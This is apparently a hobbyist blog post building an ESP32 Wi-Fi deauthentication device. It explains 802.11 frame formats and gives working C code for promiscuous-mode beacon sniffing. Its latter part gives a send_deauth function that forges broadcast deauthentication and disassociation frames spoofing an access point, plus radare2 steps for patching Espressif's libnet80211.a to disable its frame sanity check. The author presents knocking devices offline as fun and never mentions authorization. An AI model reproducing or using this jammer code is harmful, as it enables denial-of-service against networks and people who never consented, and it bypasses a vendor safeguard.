The ESP32 is a versatile Wi-Fi and Bluetooth enabled microcontroller made by Espressif. Espressif provides the ESP-IDF framework, which contains tools and libraries to program an ESP32. While the majority of the ESP-IDF framework is open-source, it unfortunately contains some binary blobs. However, it is licensed under the Apache 2.0 license, which allows us to modify it.

For this project, I decided to use the FireBeetle development board since it comes with a bidirectional USB to UART converter, plenty of GPIOs and even an on-board Li-ion battery charger! You could, however, use any board that has an ESP32 or even design your own.

Necessary functions and components

The ESP-IDF provides an API to interface with the Wi-Fi hardware. I will be using the esp_wifi_set_promiscuous function which allows us to process raw IEEE 802.11 (Wi-Fi) frames. We can provide a callback function with esp_wifi_set_promiscuous_rx_cb and it will be called whenever the ESP32 receives a frame.

Another important function is esp_wifi_80211_tx, which allows us to send (almost) any frame. Unfortunately, this function does a sanity check and will prevent us from sending deauthentication frames (probably for legal reasons). We will patch the libnet80211.a static library to remove those restrictions.

For the user interface, I will use an SSD1306 display and this library to control it.

Format of 802.11 frames

All the following information on 802.11 frames was found in the Part 11: Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications document from the IEEE.

The frames follow this format :

The Frame control field contains information about the frame :

The only important thing for us is the Type and Subtype field which will help us filter out the frames we do not want. Here’s a sample of how the frame types and subtypes are laid out:

The frame type 00 indicates a Management frame. In our case, we will need the 1000: Beacon and 1100: Deauthentication subtypes. Also, I defined the frame types to use them later:

#define IEEE80211_FRAME_TYPE_MGMT 0b00
#define IEEE80211_FRAME_TYPE_CTRL 0b01
#define IEEE80211_FRAME_TYPE_DATA 0b10
#define IEEE80211_FRAME_TYPE_MISC 0b11

#define IEEE80211_FRAME_MGMT_SUBTYPE_ASSOCIATION_REQUEST        0b0000
#define IEEE80211_FRAME_MGMT_SUBTYPE_ASSOCIATION_RESPONSE       0b0001
#define IEEE80211_FRAME_MGMT_SUBTYPE_REASSOCIATION_REQUEST      0b0010
#define IEEE80211_FRAME_MGMT_SUBTYPE_REASSOCIATION_RESPONSE     0b0011
#define IEEE80211_FRAME_MGMT_SUBTYPE_PROBE_REQUEST              0b0100
#define IEEE80211_FRAME_MGMT_SUBTYPE_PROBE_RESPONSE             0b0101
#define IEEE80211_FRAME_MGMT_SUBTYPE_BEACON                     0b1000
#define IEEE80211_FRAME_MGMT_SUBTYPE_ATIM                       0b1001
#define IEEE80211_FRAME_MGMT_SUBTYPE_DISASSOCIATION             0b1010
#define IEEE80211_FRAME_MGMT_SUBTYPE_AUTHENTICATION             0b1011
#define IEEE80211_FRAME_MGMT_SUBTYPE_DEAUTHENTICATION           0b1100
#define IEEE80211_FRAME_MGMT_SUBTYPE_ACTION                     0b1101

#define IEEE80211_FRAME_CTRL_SUBTYPE_BLOCK_ACK_REQUEST          0b1000
#define IEEE80211_FRAME_CTRL_SUBTYPE_BLOCK_ACK                  0b1001
#define IEEE80211_FRAME_CTRL_SUBTYPE_PS_POLL                    0b1010
#define IEEE80211_FRAME_CTRL_SUBTYPE_RTS                        0b1011
#define IEEE80211_FRAME_CTRL_SUBTYPE_CTS                        0b1100
#define IEEE80211_FRAME_CTRL_SUBTYPE_ACK                        0b1101
#define IEEE80211_FRAME_CTRL_SUBTYPE_CF_END                     0b1110
#define IEEE80211_FRAME_CTRL_SUBTYPE_CF_END_CF_ACK              0b1111

#define IEEE80211_FRAME_DATA_SUBTYPE_DATA                       0b0000
#define IEEE80211_FRAME_DATA_SUBTYPE_DATA_CF_ACK                0b0001
#define IEEE80211_FRAME_DATA_SUBTYPE_DATA_CF_POLL               0b0010
#define IEEE80211_FRAME_DATA_SUBTYPE_DATA_CF_ACK_CF_POLL        0b0011
#define IEEE80211_FRAME_DATA_SUBTYPE_NULL                       0b0100
#define IEEE80211_FRAME_DATA_SUBTYPE_CF_ACK                     0b0101
#define IEEE80211_FRAME_DATA_SUBTYPE_CF_POLL                    0b0110
#define IEEE80211_FRAME_DATA_SUBTYPE_CF_ACK_CF_POLL             0b0111
#define IEEE80211_FRAME_DATA_SUBTYPE_QOS_DATA                   0b1000
#define IEEE80211_FRAME_DATA_SUBTYPE_QOS_DATA_CF_ACK            0b1001
#define IEEE80211_FRAME_DATA_SUBTYPE_QOS_DATA_CF_POLL           0b1010
#define IEEE80211_FRAME_DATA_SUBTYPE_QOS_DATA_CF_ACK_CF_POLL    0b1011
#define IEEE80211_FRAME_DATA_SUBTYPE_QOS_NULL                   0b1100
/* 0b1101 is reserved */
#define IEEE80211_FRAME_DATA_SUBTYPE_QOS_CF_POLL                0b1110
#define IEEE80211_FRAME_DATA_SUBTYPE_QOS_CF_ACK_CF_POLL         0b1111
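
To make the Type and Subtype layout concrete, here is a minimal sketch that pulls both fields out of the first byte of a frame with plain shifts and masks. The helper names (fc_version, fc_type, fc_subtype, fc_is_beacon) are hypothetical and not part of ESP-IDF. It assumes the first Frame control byte as it appears on the air, where bits 0-1 are the protocol version, bits 2-3 the type and bits 4-7 the subtype.

```c
#include <stdint.h>

/* First Frame control byte as transmitted:
 * bits 0-1 = protocol version, bits 2-3 = type, bits 4-7 = subtype. */
static inline uint8_t fc_version(uint8_t fc0) { return fc0 & 0x03; }
static inline uint8_t fc_type(uint8_t fc0)    { return (fc0 >> 2) & 0x03; }
static inline uint8_t fc_subtype(uint8_t fc0) { return (fc0 >> 4) & 0x0F; }

/* Returns 1 when the byte marks a management frame (type 00)
 * with the beacon subtype (1000), 0 otherwise. */
static inline int fc_is_beacon(uint8_t fc0) {
    return fc_type(fc0) == 0x0 && fc_subtype(fc0) == 0x8;
}
```

With these helpers, a first byte of 0x80 decodes to type 0 and subtype 8 (a beacon), while 0xC0 decodes to type 0 and subtype 12 (a deauthentication).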

Frame bodies

Bodies consist of information elements which follow this general format :

Each information element has its own specific format. For example, the format of an SSID (the Wi-Fi network name you see) is :

The element ID of the SSID element can be found in the element IDs table:

So, if you wanted to encode the SSID “hotmilf”, you would end up with: [0, 7, 'h', 'o', 't', 'm', 'i', 'l', 'f'].
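
The same encoding can be sketched in C. This is only an illustration: encode_ssid_element, ELEMENT_ID_SSID and SSID_MAX_LEN are hypothetical names, and the 32-byte limit is the maximum SSID length the callback later in this post also checks for.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define ELEMENT_ID_SSID 0   /* element ID of the SSID element */
#define SSID_MAX_LEN    32  /* an SSID is at most 32 bytes long */

/* Writes [element ID, length, SSID bytes...] into out.
 * Returns the number of bytes written, or 0 if the SSID is too long
 * or the output buffer is too small. */
static size_t encode_ssid_element(const char *ssid, uint8_t *out, size_t out_size) {
    size_t len = strlen(ssid);
    if (len > SSID_MAX_LEN || out_size < len + 2) {
        return 0;
    }
    out[0] = ELEMENT_ID_SSID;
    out[1] = (uint8_t)len;
    memcpy(&out[2], ssid, len);  /* no terminating '\0' is stored */
    return len + 2;
}
```

Encoding a four-letter SSID such as "home" this way produces six bytes: the ID, the length 4, then the four characters.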

Beacon frames

A beacon frame is used by a router (often referred to as an Access Point or AP) to advertise its presence to nearby listening devices. The beacon frame’s body can contain over 50 different fields, but the important one for us is the SSID.

Deauthentication frames

Deauthentication frames are (normally) sent by the access point to a station (a device connected to the network) to kick it off the network.

Parsing frames in promiscuous mode

First off, we need to include the necessary headers :

#include "esp_wifi.h"
#include "nvs_flash.h"

Then we enable Wi-Fi on the ESP32. I have made a helper function to do all of it at once:

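void initialize_wifi(wifi_promiscuous_cb_t cb){
    // The Wi-Fi driver stores its configuration in NVS, so initialize it first
    ESP_ERROR_CHECK(nvs_flash_init());
    wifi_init_config_t config = WIFI_INIT_CONFIG_DEFAULT();
    ESP_ERROR_CHECK(esp_wifi_init(&config));
    ESP_ERROR_CHECK(esp_wifi_set_mode(WIFI_MODE_STA));
    ESP_ERROR_CHECK(esp_wifi_start());
    // Register the callback before enabling promiscuous mode so no frame is missed
    ESP_ERROR_CHECK(esp_wifi_set_promiscuous_rx_cb(cb));
    ESP_ERROR_CHECK(esp_wifi_set_promiscuous(true));
}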

The wifi_promiscuous_cb_t type is defined by the ESP-IDF framework as

typedef void (*wifi_promiscuous_cb_t)(void *buf, wifi_promiscuous_pkt_type_t type);

Sometimes, C types can be hard to decipher. You can either learn the spiral method or, if you’re lazy, use a tool like cdecl to translate the types into natural language. In this case, wifi_promiscuous_cb_t is a pointer to a function taking a void * and a wifi_promiscuous_pkt_type_t and returning nothing.
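
If function pointer typedefs are new to you, here is a small stand-alone sketch of the same pattern. Everything in it (pkt_type_t, packet_cb_t, set_rx_cb, deliver, count_mgmt) is a hypothetical stand-in and not the ESP-IDF API. It only shows how a callback of this shape is stored and later invoked.

```c
#include <stddef.h>

/* Hypothetical stand-ins for the ESP-IDF types, for illustration only. */
typedef enum { PKT_MGMT, PKT_CTRL, PKT_DATA, PKT_MISC } pkt_type_t;

/* Pointer to a function taking (void *, pkt_type_t) and returning nothing. */
typedef void (*packet_cb_t)(void *buf, pkt_type_t type);

static packet_cb_t registered_cb = NULL;
static int mgmt_frames_seen = 0;

/* Stores the callback, the way a driver would. */
static void set_rx_cb(packet_cb_t cb) { registered_cb = cb; }

/* Simulates the driver handing one received frame to the callback. */
static void deliver(void *buf, pkt_type_t type) {
    if (registered_cb != NULL) {
        registered_cb(buf, type);
    }
}

/* A callback matching packet_cb_t: counts management frames only. */
static void count_mgmt(void *buf, pkt_type_t type) {
    (void)buf;  /* unused in this sketch */
    if (type == PKT_MGMT) {
        mgmt_frames_seen++;
    }
}
```

Calling set_rx_cb(count_mgmt) and then delivering one management frame and one data frame leaves mgmt_frames_seen at 1.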

Here is the callback I came up with to store found Wi-Fi networks:

void ieee80211_analyse_cb(void *buf, wifi_promiscuous_pkt_type_t type){
    wifi_promiscuous_pkt_t *pkt = (wifi_promiscuous_pkt_t *) buf;
    wifi_pkt_rx_ctrl_t rx_ctrl = pkt->rx_ctrl;
    uint8_t *payload = pkt->payload;

    if (type == WIFI_PKT_MISC) {
        return;
    }
    if (rx_ctrl.sig_len < 24) { // The minimum packet size is 24 (that's the MAC Header's size)
        return;
    }

    ieee80211_mac_header_t *mac_header = (ieee80211_mac_header_t *) payload;
    if (mac_header->frame_control.type == IEEE80211_FRAME_TYPE_MGMT) {           // Management
        if (mac_header->frame_control.subtype == IEEE80211_FRAME_MGMT_SUBTYPE_BEACON) {      // Beacon frame
            ap_info_t ap;
            ap.last_seen_us = esp_timer_get_time();
            ap.rssi = rx_ctrl.rssi;
            ap.channel = rx_ctrl.channel;
            ap.mac_addr = mac_header->addr3;

            bool already_known_ap = false;
            for (uint8_t i = 0 ; i < amount_of_aps ; i++){
                if (memcmp(ap.mac_addr.bytes, found_aps[i].mac_addr.bytes, 6) == 0) {
                    already_known_ap = true;

                    // We update the last time seen of the AP
                    found_aps[i].last_seen_us = ap.last_seen_us;
                    found_aps[i].rssi = ap.rssi;
                    found_aps[i].channel = ap.channel;
                }
            }

            if (already_known_ap == true) { // Wifi network already found
                return;
            }
            if (amount_of_aps >= 250) { // found_aps is full, do not write past its end
                return;
            }

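            // The SSID element starts at offset 36: 24 bytes of MAC header + 12 bytes of fixed beacon fields
            if (rx_ctrl.sig_len < 38) { // Too short to hold an element ID and length
                return;
            }
            if (payload[36] != 0x00) { // The first element is not the SSID (element ID 0)
                return;
            }

            ap.ssid_length = payload[37];
            if (ap.ssid_length < 2 || ap.ssid_length > 32){ // Ignore empty, single-character and over-long SSIDs
                return;
            }
            if (rx_ctrl.sig_len < 38 + ap.ssid_length) { // The frame ends before the SSID does
                return;
            }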

            memset(ap.ssid, 0x00, 32);
            memcpy(ap.ssid, &payload[38], ap.ssid_length);

            if (ap.ssid[0] == '\0'){ // Skip SSIDs that start with a null byte (typically hidden networks)
                return;
            }

            found_aps[amount_of_aps] = ap;
            amount_of_aps++;
            uart_write_bytes(UART_NUM_0, ap.ssid, ap.ssid_length);
            uart_write_bytes(UART_NUM_0, "\n", 1);
        }
    } else if (mac_header->frame_control.type == IEEE80211_FRAME_TYPE_CTRL) {    // Control

    } else if (mac_header->frame_control.type == IEEE80211_FRAME_TYPE_DATA) {    // Data

    } else {                                    // Reserved

    }
}

At the beginning of the function, we do some basic checks and create variables with more meaningful names. Then we only continue if the frame is a beacon frame. After that, we check if we have already found this access point. found_aps and amount_of_aps are global variables declared previously. APs are uniquely identified with their BSSID (their MAC address).

extern ap_info_t found_aps[250];
extern uint8_t amount_of_aps;
extern uint8_t ap_index; // (Used for the interface to scroll between found networks)
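
The callback relies on a few types that are not shown in this post (mac_addr_t, ieee80211_mac_header_t and ap_info_t). As a rough sketch, they could look like the following. The field names are guessed from how the callback uses them, and everything else (field order, the 33-byte ssid buffer, the is_beacon helper) is an assumption. Bit-field layout is compiler-dependent; this version matches GCC on little-endian targets.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

typedef struct mac_addr_t { uint8_t bytes[6]; } mac_addr_t;

/* Assumed Frame control layout (GCC, little-endian bit-field order). */
typedef struct {
    uint16_t protocol_version : 2;
    uint16_t type             : 2;
    uint16_t subtype          : 4;
    uint16_t to_ds            : 1;
    uint16_t from_ds          : 1;
    uint16_t more_fragments   : 1;
    uint16_t retry            : 1;
    uint16_t power_management : 1;
    uint16_t more_data        : 1;
    uint16_t protected_frame  : 1;
    uint16_t order            : 1;
} __attribute__((packed)) ieee80211_frame_control_t;

/* The 24-byte MAC header of a management frame. */
typedef struct {
    ieee80211_frame_control_t frame_control;
    uint16_t   duration_id;
    mac_addr_t addr1;
    mac_addr_t addr2;
    mac_addr_t addr3;
    uint16_t   sequence_control;
} __attribute__((packed)) ieee80211_mac_header_t;

_Static_assert(sizeof(ieee80211_mac_header_t) == 24, "MAC header must be 24 bytes");

/* Hypothetical record for one access point. */
typedef struct {
    mac_addr_t mac_addr;
    char       ssid[33];      /* 32 bytes of SSID plus room for a '\0' */
    uint8_t    ssid_length;
    int8_t     rssi;
    uint8_t    channel;
    int64_t    last_seen_us;
} ap_info_t;

/* Copies the header out of a raw buffer and checks for type 0, subtype 8. */
static bool is_beacon(const uint8_t *frame, size_t len) {
    ieee80211_mac_header_t hdr;
    if (len < sizeof(hdr)) {
        return false;
    }
    memcpy(&hdr, frame, sizeof(hdr));
    return hdr.frame_control.type == 0 && hdr.frame_control.subtype == 8;
}
```

Copying the header with memcpy instead of casting the buffer pointer sidesteps alignment and aliasing questions, at the cost of 24 copied bytes per frame.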

If the AP found is a new one, we do some basic checks to make sure it’s not malformed and store it in found_aps. The way I currently have it set up allows for only 250 APs, and the check to see if the AP has already been found is O(n), where n is the number of APs found. With a hash map of 256 buckets, the average lookup could be brought down to roughly n/256 comparisons, but I didn’t bother because the ESP32 is fast enough.
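
For the curious, the hash map idea could be sketched like this. It is not what the project uses. The names (ap_table_init, ap_table_find, ap_table_insert) are hypothetical, and using the last byte of the BSSID as the bucket index is a deliberately simple assumption rather than a good hash.

```c
#include <stdint.h>
#include <string.h>

#define MAX_APS     250
#define NUM_BUCKETS 256
#define NO_ENTRY    0xFF  /* valid indices are 0..249, so 0xFF marks "none" */

static uint8_t known_macs[MAX_APS][6];   /* stored BSSIDs */
static uint8_t next_in_bucket[MAX_APS];  /* chain link for each stored BSSID */
static uint8_t bucket_head[NUM_BUCKETS]; /* first entry of each bucket */
static uint8_t known_count = 0;

static void ap_table_init(void) {
    memset(bucket_head, NO_ENTRY, sizeof(bucket_head));
    known_count = 0;
}

/* Simplistic hash: the last byte of the BSSID selects the bucket. */
static uint8_t bucket_of(const uint8_t mac[6]) { return mac[5]; }

/* Returns the index of the BSSID, or -1 if it is not stored. */
static int ap_table_find(const uint8_t mac[6]) {
    for (uint8_t i = bucket_head[bucket_of(mac)]; i != NO_ENTRY; i = next_in_bucket[i]) {
        if (memcmp(known_macs[i], mac, 6) == 0) {
            return i;
        }
    }
    return -1;
}

/* Stores the BSSID if absent. Returns its index, or -1 when the table is full. */
static int ap_table_insert(const uint8_t mac[6]) {
    int existing = ap_table_find(mac);
    if (existing >= 0) {
        return existing;
    }
    if (known_count >= MAX_APS) {
        return -1;
    }
    uint8_t idx = known_count++;
    uint8_t b = bucket_of(mac);
    memcpy(known_macs[idx], mac, 6);
    next_in_bucket[idx] = bucket_head[b];  /* push onto the front of the chain */
    bucket_head[b] = idx;
    return idx;
}
```

Only the BSSIDs that share a bucket are compared on each lookup, which is where the n/256 average comes from when the last bytes are evenly spread.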

Sending deauthentication frames (the fun part)

I then made a function that takes an AP and sends a deauthentication frame over the air:

void send_deauth(struct mac_addr_t *ap){
    struct mac_addr_t sta;
    sta.bytes[0] = 0xff;
    sta.bytes[1] = 0xff;
    sta.bytes[2] = 0xff;
    sta.bytes[3] = 0xff;
    sta.bytes[4] = 0xff;
    sta.bytes[5] = 0xff;

    uint8_t payload[30] = {
        0xC0, 0x00,                         // Deauthentication frame
        0x3a, 0x01,                         // Frame duration
        0x01, 0x02, 0x03, 0x04, 0x05, 0x06, // Destination
        0x01, 0x02, 0x03, 0x04, 0x05, 0x06, // Source
        0x01, 0x02, 0x03, 0x04, 0x05, 0x06, // BSSID
        0x00, 0x00,                         // Sequence number
        0xf0, 0x19,                         // Reason code (0x19f0 little-endian; "Unspecified" would be 0x01, 0x00)
        0x00, 0x00,                         // All SSIDS
        0x21, 0x00
    };

    memcpy(&payload[4], sta.bytes, 6);
    memcpy(&payload[10], ap->bytes, 6);
    memcpy(&payload[16], ap->bytes, 6);

    payload[0] = 0xC0;
    esp_wifi_80211_tx(WIFI_IF_STA, payload, sizeof(payload), true);
    payload[0] = 0xA0;
    esp_wifi_80211_tx(WIFI_IF_STA, payload, sizeof(payload), true);
}

If you recall the MAC frame format, it has three fields for addresses. The values of the To DS and From DS bits in the frame control field dictate which address goes in each address field.

Here To DS and From DS should be 0 because it is a management frame.
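
The mapping from the To DS and From DS bits to the address fields can be written out as a small lookup. This is a sketch with hypothetical names (addr_role_t, addr_layout_t, address_layout). The four combinations follow the address field table in the 802.11 standard, where the fourth address is only present when both bits are set.

```c
typedef enum {
    ROLE_DA,     /* Destination Address */
    ROLE_SA,     /* Source Address */
    ROLE_BSSID,  /* the AP's MAC address */
    ROLE_RA,     /* Receiving Address */
    ROLE_TA,     /* Transmitting Address */
    ROLE_UNUSED  /* field not present */
} addr_role_t;

typedef struct { addr_role_t addr1, addr2, addr3, addr4; } addr_layout_t;

/* Returns what each address field holds for a given To DS / From DS pair. */
static addr_layout_t address_layout(int to_ds, int from_ds) {
    if (!to_ds && !from_ds) {  /* management frames and station-to-station traffic */
        return (addr_layout_t){ ROLE_DA, ROLE_SA, ROLE_BSSID, ROLE_UNUSED };
    }
    if (!to_ds && from_ds) {   /* from the AP to a station */
        return (addr_layout_t){ ROLE_DA, ROLE_BSSID, ROLE_SA, ROLE_UNUSED };
    }
    if (to_ds && !from_ds) {   /* from a station to the AP */
        return (addr_layout_t){ ROLE_BSSID, ROLE_SA, ROLE_DA, ROLE_UNUSED };
    }
    /* both bits set: relayed between APs, all four addresses are used */
    return (addr_layout_t){ ROLE_RA, ROLE_TA, ROLE_DA, ROLE_SA };
}
```

For the management frames used here, both bits are 0, so address 1 is the destination, address 2 is the source and address 3 is the BSSID.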

RA: Receiving Address
DA: Destination Address
TA: Transmitting Address
SA: Source Address

You might think that the RA is always going to be the same as the DA, but that is not the case. For example, imagine the routers are in mesh mode and are connected like so: Router1 is connected to Router2, which is connected to Device1. If Router1 wants to send a message to Device1, it has to pass through Router2. The RA will be Router2’s address and the DA will be Device1’s address.

But we don’t have to worry about that. The only thing we need to do is set address1 to the address of the device we want to deauthenticate, and address2 and address3 to the AP’s BSSID.

In my case, I set RA to FF:FF:FF:FF:FF:FF, which is the broadcast address. So the frame we’re sending will be interpreted by listening devices as: the AP sends a deauthentication frame to everyone. After sending the deauthentication frame, I change the subtype to disassociation and send it again because more disconnecting = more funny.

After compiling everything and running, nothing works. I can see on my OLED interface the wifi networks being found but I can’t disconnect anything from the network, what’s wrong? On the serial port, I can read : unsupport frame type: 0c0.

It turns out that Espressif’s ESP-IDF prevents you from sending any frame you want. I found a page by wildspider on how to circumvent the restrictions. I recommend reading it because it goes into detail on how to patch the executable. You can read it here.

It worked, but I wanted more. I wanted to patch the static library directly so I would not have to patch the executable every time I recompile. I found the location of the library I wanted to patch: esp-idf/components/esp_wifi/lib/esp32/libnet80211.a. Running ar -x libnet80211.a extracted all of the object files. The guilty object file was ieee80211_output.o. I loaded it into radare2 with radare2 -a xtensa ieee80211_output.o and seeked to sym.ieee80211_raw_frame_sanity_check. I tried overwriting just the necessary parts like wildspider did, but I was getting relocation errors when compiling the program. It turns out the object file carries relocation entries that expect jumps at specific places, and if they are not there, the linker gives an error. I tried for a while to remove the relocations from the object file, but I ended up taking the easy solution and returning immediately from the function.

The ieee80211_raw_frame_sanity_check before/after:

[0x08002d68]> pdf
┌ 423: sym.ieee80211_raw_frame_sanity_check (int32_t arg_10h, int32_t arg_14h);
│       ╎   ; arg int32_t arg_10h @ a1+0x10
│       ╎   ; arg int32_t arg_14h @ a1+0x14
│       ╎   0x08002d68      368100         entry a1, 64
│       ╎   0x08002d6b      505074         extui a5, a5, 0, 8
│       ╎   0x08002d6e      5941           s32i.n a5, a1, 16
│      ┌──< 0x08002d70      dc53           bnez.n a3, 0x08002d89
│      │╎   0x08002d72      0c1c           movi.n a12, 1
│      │╎   0x08002d74      4c0b           movi.n a11, 64
│      │╎   0x08002d76      ad0c           mov.n a10, a12
│      │╎   0x08002d78      d1e6ff         l32r a13, 0x08002d10        ; [0x8002d10:4]=0
│      │╎   0x08002d7b      c02000         memw
│      │╎   0x08002d7e      81f1ff         l32r a8, 0x08002d44         ; [0x8002d44:4]=0
│      │╎   0x08002d81      e00800         callx8 a8
│     ┌───< 0x08002d84      060d00         j 0x08002dbc
[...]

to

[0x08002d68]> pdf
┌ 8: sym.ieee80211_raw_frame_sanity_check ();
│ rg: 0 (vars 0, args 0)
│ bp: 0 (vars 0, args 0)
│ sp: 0 (vars 0, args 0)
│           0x08002d68      368100         entry a1, 64
│           0x08002d6b      22a000         movi a2, 0
└           0x08002d6e      1df0           retw.n

The a2 register holds the return value, so I set it to 0 to signal that the frame is OK. I repacked all the objects into libnet80211.a and I was able to compile, run and deauthenticate without any problem!

This was my first project with an ESP32 and I’m quite happy with the result. I learned a few things about the components system of ESP-IDF and the inner workings of Wi-Fi and the basics of Wireshark.